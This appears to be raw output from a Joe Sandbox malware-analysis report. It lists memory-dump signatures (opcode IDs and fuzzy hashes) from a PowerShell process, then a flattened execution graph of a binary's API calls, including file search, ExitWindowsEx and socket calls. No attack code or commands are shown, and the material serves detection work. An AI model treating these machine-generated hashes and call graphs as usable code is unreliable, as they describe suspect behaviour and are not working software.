                                                                                                                  • Opcode ID: 6cb9673927629eb0b924be55dd51d12e3ce6da7d6fbb2af26d64fff1ddc0be88
                                                                                                                  • Instruction ID: 8c745d0d6dee2f1844437959f6890bf1245166af8540e79052730413e0565333
                                                                                                                  • Opcode Fuzzy Hash: 6cb9673927629eb0b924be55dd51d12e3ce6da7d6fbb2af26d64fff1ddc0be88
                                                                                                                  • Instruction Fuzzy Hash: 4E41C262E2FF864BE799DB6D08652786AD2FF81351B4940BAD58DC71E3EC48FA804341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2277370557.00007FF9BB6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB6C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb6c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 097375d328460f842aa0b1e155069021080045a2085119f7cacdabd41b838586
                                                                                                                  • Instruction ID: cb2ec03eb814b50e44fe6b740b4890eb913504dc8f3b3a97157e8a8f3b277086
                                                                                                                  • Opcode Fuzzy Hash: 097375d328460f842aa0b1e155069021080045a2085119f7cacdabd41b838586
                                                                                                                  • Instruction Fuzzy Hash: 5831013090C64C8FDB49DFA8D84AAF97BF0EB56320F0441ABD04DC7163DA65A946CB92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5c51a1bedd67aadd65c71b7e2a1bfb25cbbe20c6a736ffdb09b9c2ded096df5e
                                                                                                                  • Instruction ID: f808e7fc39501ccc449e62cd468faa74cd7faed57bd98207ee6ae0592359305b
                                                                                                                  • Opcode Fuzzy Hash: 5c51a1bedd67aadd65c71b7e2a1bfb25cbbe20c6a736ffdb09b9c2ded096df5e
                                                                                                                  • Instruction Fuzzy Hash: F221E171909A8E0FD792DFAC94957ED7FE1FF4A320F4400ABE14CD32A2DA6819468781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 05706933f2336252380dd130acbd9f0a7f774cd5ffa7cb2888afc98981b9d700
                                                                                                                  • Instruction ID: e05340e1a601d7c327a2b0f84d79e99be85946c49d0fd58517d620bfe67b383f
                                                                                                                  • Opcode Fuzzy Hash: 05706933f2336252380dd130acbd9f0a7f774cd5ffa7cb2888afc98981b9d700
                                                                                                                  • Instruction Fuzzy Hash: 6C21D222A1EF4A4BE399DB2C2C9527866D2FF85221B8900BAE54DC72E7ED59FD014341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2246107726.00007FF9BB3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb3c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b01e63902e579e41b617c1bba853fd6f943edf7b29c517813291091159eabbab
                                                                                                                  • Instruction ID: 2aff89dbb94da01b201acac0bdbe299d83039cb1494d38cca8fb2209863395db
                                                                                                                  • Opcode Fuzzy Hash: b01e63902e579e41b617c1bba853fd6f943edf7b29c517813291091159eabbab
                                                                                                                  • Instruction Fuzzy Hash: 3F210211B1DE150BF258B76C681A7BAA2C6EF89721F5441BBE40EC33E3EC597C024291
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e77c72b3532d46e0f3c90ffe84ac4987bc72601dec3c52305be491c4d0225f71
                                                                                                                  • Instruction ID: 9136511a1f14dae294889c228637da4ac1c1124f51a1e853a546256e773659c5
                                                                                                                  • Opcode Fuzzy Hash: e77c72b3532d46e0f3c90ffe84ac4987bc72601dec3c52305be491c4d0225f71
                                                                                                                  • Instruction Fuzzy Hash: 8D21A731B1CE0A4FEB95EE0CA4816F973E2FB98310B10057AD04EC328BDEA5F9458781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 125837b65bf5107a9d5cdcec5be60e36e3c26abfd49d7f7a94a5264e825729ee
                                                                                                                  • Instruction ID: beab1b652c303a184dca9d60a1a9c2944e91d8009b2cb1bfd7b052e47806c7d0
                                                                                                                  • Opcode Fuzzy Hash: 125837b65bf5107a9d5cdcec5be60e36e3c26abfd49d7f7a94a5264e825729ee
                                                                                                                  • Instruction Fuzzy Hash: B221309190FBC68FE757DF2C08656B47FE1AF57200B8900FAC189CB1E3D889B90A8711
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e06b8e97ba09b724d5d8d35d937cd40639991ce3cfdd933cc930ff82c0b171af
                                                                                                                  • Instruction ID: 324653fb128525a1a840a2f8ef3d44e8066b0bfab09aea0f43ae2398c3812c88
                                                                                                                  • Opcode Fuzzy Hash: e06b8e97ba09b724d5d8d35d937cd40639991ce3cfdd933cc930ff82c0b171af
                                                                                                                  • Instruction Fuzzy Hash: 5011DF6190DA864FD3A5DB3C84453A57BA1FF4A32470802FED088CB6D7DAA9A8458792
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2246107726.00007FF9BB3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb3c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcea48149d88241b21432eec3cc180840ae257342f6b27ddc63e4f55f675ae26
                                                                                                                  • Instruction ID: 77a16c42dc62874f1cd4b38d4f3e013dfcc6836b9763c99e871df5147acacf76
                                                                                                                  • Opcode Fuzzy Hash: bcea48149d88241b21432eec3cc180840ae257342f6b27ddc63e4f55f675ae26
                                                                                                                  • Instruction Fuzzy Hash: 1A01042190EBA20FE306E76C38955F23FA4DF1723470940F7D48DCA1E3DC89284687A9
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2230233829.00007FF9BB1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb1a0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bb1eeb8a7949d810bcbe54852a9c0f9d7ec9529860ad69b2dc9944d2e16262cd
                                                                                                                  • Instruction ID: 36991aa6339ce7177ea1e1ebfb856fd51dfedd96c9a227eccac0adeaa896a820
                                                                                                                  • Opcode Fuzzy Hash: bb1eeb8a7949d810bcbe54852a9c0f9d7ec9529860ad69b2dc9944d2e16262cd
                                                                                                                  • Instruction Fuzzy Hash: 6101D620708C4A9FD345EB2D8054BA57BD2FFA9310F1401F6D00DCB293DE69F9818781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0642305961d44c735fe13a3a96981c161ae6dd09533ec87ea6f7e061ad6eac36
                                                                                                                  • Instruction ID: 925470b64ef1fff3564fef6a7221d3f90c8f688afdd31c69b126da9d33cab43e
                                                                                                                  • Opcode Fuzzy Hash: 0642305961d44c735fe13a3a96981c161ae6dd09533ec87ea6f7e061ad6eac36
                                                                                                                  • Instruction Fuzzy Hash: 2C018452D0EAD25FE757EF2818562E06FA0FF26240B4900F6D148CB1F3E9C97D858341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6c5273b383d64bbf9df138964639aac6fccaddb818fa68e35667912401cf1668
                                                                                                                  • Instruction ID: 2adc602c500ab64cfed07fcb73546c08bad555d3240ca998597c904c94a37ad2
                                                                                                                  • Opcode Fuzzy Hash: 6c5273b383d64bbf9df138964639aac6fccaddb818fa68e35667912401cf1668
                                                                                                                  • Instruction Fuzzy Hash: DF01B12191EF860BD761DF3C18062957BA0BF02260B0447AAD1BDCB1E7D96C69464741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1ae29eb8d2871178207fd7416c5184e2bbb301bb652d1ff7eb146e5c616aec92
                                                                                                                  • Instruction ID: b0369223463e8359af8e90bca9ee60dfaff3cfbd5f5a8151f440d4fb67fd0f0b
                                                                                                                  • Opcode Fuzzy Hash: 1ae29eb8d2871178207fd7416c5184e2bbb301bb652d1ff7eb146e5c616aec92
                                                                                                                  • Instruction Fuzzy Hash: AFE04F22D1D9964FE3D6AF1C24512A46AD1FB1965074901F7E14CCA2E3ED5C6E8287C1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2230233829.00007FF9BB1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb1a0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0c334f4d18f3e9b5577bba07ecd8f87abe658fe8f4cc3b05bed4178d4046521f
                                                                                                                  • Instruction ID: 6fd83ea93d543886fd020b6372b7df20b9a5c74ab015fcea1d65647472d608c3
                                                                                                                  • Opcode Fuzzy Hash: 0c334f4d18f3e9b5577bba07ecd8f87abe658fe8f4cc3b05bed4178d4046521f
                                                                                                                  • Instruction Fuzzy Hash: E5D05E30908E0A4EA7B8EE2FD455B7273E1EF68215700467AD449C26B5DAA5FDC687C0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2287935941.00007FF9BB820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB820000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb820000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ^^'1$^^/-$^^3+$^^7)$^^?%
                                                                                                                  • API String ID: 0-2055594521
                                                                                                                  • Opcode ID: 0cb821771fa8e54d97904d004b25073cd4128d60cc53c6941536d8f1552a5ea7
                                                                                                                  • Instruction ID: 7e3bbf4cf9c98bec6f91c1af989cbce48f3a4a86ec6dc80146cc042dede38645
                                                                                                                  • Opcode Fuzzy Hash: 0cb821771fa8e54d97904d004b25073cd4128d60cc53c6941536d8f1552a5ea7
                                                                                                                  • Instruction Fuzzy Hash: 6D51773BC08A1266D615F7B874421E52724DF02738B26C5F7E08E8F093ED297465AEDD
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2287935941.00007FF9BB820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB820000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb820000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ^^ )$^^&#$^^(!$^^J
                                                                                                                  • API String ID: 0-2469846320
                                                                                                                  • Opcode ID: e08022ac19ef0c71b5aa99f458e0b6f53b8169ee0c8ca4805a02cffb5facd14f
                                                                                                                  • Instruction ID: c499f366f9cc4296275683608eba2f20da762bde54ca15609ad6de06292a474e
                                                                                                                  • Opcode Fuzzy Hash: e08022ac19ef0c71b5aa99f458e0b6f53b8169ee0c8ca4805a02cffb5facd14f
                                                                                                                  • Instruction Fuzzy Hash: 7941B33B808A2265E501FBB8B4521E937798F06238B26C4F3D0CF4E097ED293455AEDD
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:5.2%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:12.4%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:79
98070->98072 98071->98073 98072->98073 98073->98021 98076->98052 98078 11028283 98077->98078 98079 110288cb 98077->98079 98080 11028340 GetModuleFileNameA 98078->98080 98089 110282b8 98078->98089 98082 11028967 98079->98082 98083 1102897a 98079->98083 98081 11028361 _strrchr 98080->98081 98088 1116067b std::_Mutex::_Mutex 143 API calls 98081->98088 98084 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98082->98084 98085 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98083->98085 98086 11028976 98084->98086 98087 1102898b 98085->98087 98086->98055 98087->98055 98090 1102833b 98088->98090 98089->98089 98091 1116067b std::_Mutex::_Mutex 143 API calls 98089->98091 98090->98079 98107 110264a0 81 API calls 2 library calls 98090->98107 98091->98090 98093 110283b4 98094 1115f4c7 std::_Mutex::_Mutex 79 API calls 98093->98094 98104 11028835 98093->98104 98096 110283c5 98094->98096 98096->98104 98108 11026310 66 API calls 3 library calls 98096->98108 98098 110283f0 98109 110264a0 81 API calls 2 library calls 98098->98109 98100 11028400 std::_Mutex::_Mutex 98100->98104 98110 110264a0 81 API calls 2 library calls 98100->98110 98102 11028423 __mbschr_l 98102->98104 98106 11160d5e 85 API calls _LangCountryEnumProc@4 98102->98106 98111 11026310 66 API calls 3 library calls 98102->98111 98112 110264a0 81 API calls 2 library calls 98102->98112 98113 11160445 98104->98113 98106->98102 98107->98093 98108->98098 98109->98100 98110->98102 98111->98102 98112->98102 98114 11160451 __setmbcp 98113->98114 98115 11160463 98114->98115 98116 11160478 98114->98116 98148 111659cf 66 API calls __getptd_noexit 98115->98148 98124 11160473 __setmbcp 98116->98124 98126 11167679 98116->98126 98119 11160468 98149 1116a5e4 11 API calls __mbsupr_s_l 98119->98149 98124->98079 98127 111676ad EnterCriticalSection 98126->98127 98128 1116768b 98126->98128 98130 11160491 98127->98130 98128->98127 98129 11167693 98128->98129 98131 1116fdec __lock 66 API 
calls 98129->98131 98132 111603d8 98130->98132 98131->98130 98133 111603fd 98132->98133 98134 111603e9 98132->98134 98140 111603f9 98133->98140 98151 11167757 98133->98151 98184 111659cf 66 API calls __getptd_noexit 98134->98184 98136 111603ee 98185 1116a5e4 11 API calls __mbsupr_s_l 98136->98185 98150 111604b1 LeaveCriticalSection LeaveCriticalSection _fgets 98140->98150 98143 11165967 __flsbuf 66 API calls 98144 11160417 98143->98144 98161 1116d6b4 98144->98161 98146 1116041d 98146->98140 98147 1115f2c5 _free 66 API calls 98146->98147 98147->98140 98148->98119 98149->98124 98150->98124 98152 11167770 98151->98152 98156 11160409 98151->98156 98153 11165967 __flsbuf 66 API calls 98152->98153 98152->98156 98154 1116778b 98153->98154 98186 1116e8f4 97 API calls 6 library calls 98154->98186 98157 1116d778 98156->98157 98158 11160411 98157->98158 98159 1116d788 98157->98159 98158->98143 98159->98158 98160 1115f2c5 _free 66 API calls 98159->98160 98160->98158 98162 1116d6c0 __setmbcp 98161->98162 98163 1116d6e3 98162->98163 98164 1116d6c8 98162->98164 98165 1116d6ef 98163->98165 98170 1116d729 98163->98170 98187 111659e2 66 API calls __getptd_noexit 98164->98187 98189 111659e2 66 API calls __getptd_noexit 98165->98189 98168 1116d6cd 98188 111659cf 66 API calls __getptd_noexit 98168->98188 98169 1116d6f4 98190 111659cf 66 API calls __getptd_noexit 98169->98190 98173 111730e5 ___lock_fhandle 68 API calls 98170->98173 98175 1116d72f 98173->98175 98174 1116d6fc 98191 1116a5e4 11 API calls __mbsupr_s_l 98174->98191 98177 1116d73d 98175->98177 98178 1116d749 98175->98178 98181 1116d618 __close_nolock 69 API calls 98177->98181 98192 111659cf 66 API calls __getptd_noexit 98178->98192 98180 1116d6d5 __setmbcp 98180->98146 98182 1116d743 98181->98182 98193 1116d770 LeaveCriticalSection __unlock_fhandle 98182->98193 98184->98136 98185->98140 98186->98156 98187->98168 98188->98180 98189->98169 98190->98174 98191->98180 98192->98182 98193->98180 98194 111584f0 98195 11158504 
98194->98195 98196 111584fc 98194->98196 98197 1115f88b _calloc 66 API calls 98195->98197 98198 11158518 98197->98198 98199 11158524 98198->98199 98200 11158650 98198->98200 98206 11158130 CoInitializeSecurity CoCreateInstance 98198->98206 98202 1115f2c5 _free 66 API calls 98200->98202 98203 11158678 98202->98203 98204 11158541 98204->98200 98205 11158634 SetLastError 98204->98205 98205->98204 98207 111581a5 wsprintfW SysAllocString 98206->98207 98208 11158324 98206->98208 98212 111581eb 98207->98212 98209 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98208->98209 98211 11158350 98209->98211 98210 11158311 SysFreeString 98210->98208 98211->98204 98212->98210 98212->98212 98213 1115827c 98212->98213 98214 1115826a wsprintfW 98212->98214 98222 111582f9 98212->98222 98223 11096560 98213->98223 98214->98213 98216 1115828e 98217 11096560 266 API calls 98216->98217 98218 111582a3 98217->98218 98228 11096620 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 98218->98228 98220 111582e7 98229 11096620 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 98220->98229 98222->98210 98224 1110c4b0 std::_Mutex::_Mutex 265 API calls 98223->98224 98225 11096593 98224->98225 98226 110965a6 SysAllocString 98225->98226 98227 110965c4 _com_util::ConvertStringToBSTR 98225->98227 98226->98227 98227->98216 98228->98220 98229->98222 98230 1102ce84 98231 1102ce91 98230->98231 98232 1102ceb2 98231->98232 98317 1109e270 275 API calls std::_Mutex::_Mutex 98231->98317 98318 11028ae0 455 API calls std::_Mutex::_Mutex 98232->98318 98235 1102cec3 98300 11027cd0 SetEvent 98235->98300 98237 1102cec8 98238 1102ced2 98237->98238 98239 1102cedd 98237->98239 98319 110ea630 1019 API calls 98238->98319 98241 1102cefa 98239->98241 98242 1102ceff 98239->98242 98320 11058ae0 SetEvent 98241->98320 98244 1102cf07 98242->98244 98245 1102cf3e 98242->98245 98244->98245 98251 1102cf33 Sleep 98244->98251 98246 11142790 std::_Mutex::_Mutex 21 API calls 
98245->98246 98247 1102cf48 98246->98247 98248 1102cf55 98247->98248 98249 1102cf86 98247->98249 98248->98247 98252 1105d350 79 API calls 98248->98252 98250 1102cf83 98249->98250 98301 110af030 98249->98301 98250->98249 98251->98245 98253 1102cf78 98252->98253 98253->98249 98321 1102cbe0 294 API calls std::_Mutex::_Mutex 98253->98321 98260 1102cfca 98261 1102cfdd 98260->98261 98323 11132790 299 API calls 5 library calls 98260->98323 98262 1100d4f0 FreeLibrary 98261->98262 98264 1102d2e9 98262->98264 98265 1100d210 wsprintfA 98264->98265 98271 1102d300 98264->98271 98266 1102d2f5 98265->98266 98268 11142790 std::_Mutex::_Mutex 21 API calls 98266->98268 98267 1102d327 GetModuleFileNameA GetFileAttributesA 98269 1102d34f 98267->98269 98299 1102d443 98267->98299 98268->98271 98272 1110c4b0 std::_Mutex::_Mutex 265 API calls 98269->98272 98270 11142790 std::_Mutex::_Mutex 21 API calls 98273 1102d4f2 98270->98273 98271->98267 98271->98299 98274 1102d356 98272->98274 98334 11142750 FreeLibrary 98273->98334 98324 1113ee00 98274->98324 98276 1102d4fa 98278 1102d536 98276->98278 98281 1102d524 ExitWindowsEx 98276->98281 98282 1102d514 ExitWindowsEx Sleep 98276->98282 98279 1102d546 98278->98279 98280 1102d53b Sleep 98278->98280 98283 11142790 std::_Mutex::_Mutex 21 API calls 98279->98283 98280->98279 98281->98278 98282->98281 98284 1102d550 ExitProcess 98283->98284 98286 1102d378 98287 1113ef50 86 API calls 98286->98287 98288 1102d39d 98287->98288 98289 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 98288->98289 98288->98299 98290 1102d3b3 98289->98290 98291 1102d3ce _memset 98290->98291 98332 110290c0 265 API calls 2 library calls 98290->98332 98293 1102d3e8 FindFirstFileA 98291->98293 98294 1102d408 FindNextFileA 98293->98294 98296 1102d428 FindClose 98294->98296 98297 1102d434 98296->98297 98333 11123690 291 API calls 5 library calls 98297->98333 98299->98270 98300->98237 98335 1107f700 98301->98335 98306 1102cfaa 98310 110e8cf0 98306->98310 98307 110af077 98347 110290c0 265 
API calls 2 library calls 98307->98347 98311 110af030 267 API calls 98310->98311 98312 110e8d1d 98311->98312 98363 110e80c0 98312->98363 98316 1102cfb5 98322 110af220 267 API calls std::_Mutex::_Mutex 98316->98322 98317->98232 98318->98235 98319->98239 98320->98242 98321->98250 98322->98260 98323->98261 98325 1113ee48 98324->98325 98328 1113ee0e 98324->98328 98326 1113e630 std::_Mutex::_Mutex 265 API calls 98325->98326 98327 1113ee50 98326->98327 98327->98286 98328->98325 98329 1113ee32 98328->98329 98376 1113e6b0 267 API calls std::_Mutex::_Mutex 98329->98376 98331 1113ee38 98331->98286 98333->98299 98334->98276 98336 1107f724 98335->98336 98337 1107f73f 98336->98337 98338 1107f728 98336->98338 98340 1107f73c 98337->98340 98341 1107f758 98337->98341 98348 110290c0 265 API calls 2 library calls 98338->98348 98340->98337 98349 110290c0 265 API calls 2 library calls 98340->98349 98344 110af020 98341->98344 98350 110803e0 98344->98350 98351 1108042d 98350->98351 98352 11080401 98350->98352 98355 1108047a wsprintfA 98351->98355 98356 11080455 wsprintfA 98351->98356 98352->98351 98353 1108041b 98352->98353 98354 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98353->98354 98357 11080429 98354->98357 98362 110290c0 265 API calls 2 library calls 98355->98362 98356->98351 98357->98306 98357->98307 98365 110e80cb 98363->98365 98364 110e8165 98373 110af220 267 API calls std::_Mutex::_Mutex 98364->98373 98365->98364 98366 110e80ee 98365->98366 98368 110e8105 98365->98368 98374 110290c0 265 API calls 2 library calls 98366->98374 98369 110e8102 98368->98369 98370 110e8132 SendMessageTimeoutA 98368->98370 98369->98368 98375 110290c0 265 API calls 2 library calls 98369->98375 98370->98364 98373->98316 98376->98331 98377 6beb63a0 98382 6beb6350 98377->98382 98380 6beb63a9 WSACancelBlockingCall 98381 6beb63b1 Sleep 98383 6beb638d 98382->98383 98386 6bed28e1 98383->98386 98385 6beb6397 98385->98380 98385->98381 98387 6bed28e9 98386->98387 98388 6bed28eb 
IsDebuggerPresent 98386->98388 98387->98385 98394 6bee4e77 98388->98394 98391 6bed8bba SetUnhandledExceptionFilter UnhandledExceptionFilter 98392 6bed8bdf GetCurrentProcess TerminateProcess 98391->98392 98393 6bed8bd7 __call_reportfault 98391->98393 98392->98385 98393->98392 98394->98391 98395 6bed5ae6 98396 6bed5af6 98395->98396 98397 6bed5af1 98395->98397 98401 6bed59f0 98396->98401 98409 6bedf28f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 98397->98409 98400 6bed5b04 98402 6bed59fc 98401->98402 98406 6bed5a99 98402->98406 98407 6bed5a49 ___DllMainCRTStartup 98402->98407 98410 6bed588c 98402->98410 98404 6bed5a79 98405 6bed588c __CRT_INIT@12 145 API calls 98404->98405 98404->98406 98405->98406 98406->98400 98407->98404 98407->98406 98408 6bed588c __CRT_INIT@12 145 API calls 98407->98408 98408->98404 98409->98396 98411 6bed5898 98410->98411 98412 6bed591a 98411->98412 98413 6bed58a0 98411->98413 98415 6bed597b 98412->98415 98416 6bed5920 98412->98416 98463 6bed607f HeapCreate 98413->98463 98417 6bed59d9 98415->98417 98418 6bed5980 98415->98418 98421 6bed593e 98416->98421 98430 6bed58a9 98416->98430 98521 6bed5e35 11 API calls _doexit 98416->98521 98417->98430 98540 6bed70ad 40 API calls __freefls@4 98417->98540 98526 6bed6da9 TlsGetValue DecodePointer TlsSetValue 98418->98526 98419 6bed58a5 98419->98430 98464 6bed7127 GetModuleHandleW 98419->98464 98424 6bed5952 98421->98424 98522 6bed9b09 26 API calls _free 98421->98522 98525 6bed5965 29 API calls __mtterm 98424->98525 98426 6bed5985 98527 6bedd3f5 98426->98527 98427 6bed58b5 __RTC_Initialize 98438 6bed58c5 GetCommandLineA 98427->98438 98455 6bed58b9 98427->98455 98430->98407 98433 6bed5948 98523 6bed6dfa 29 API calls _free 98433->98523 98434 6bed599d DecodePointer 98439 6bed59b2 98434->98439 98437 6bed594d 98524 6bed609d HeapDestroy 98437->98524 98489 6bedf016 GetEnvironmentStringsW 98438->98489 98442 6bed59cd 98439->98442 98443 6bed59b6 98439->98443 98534 
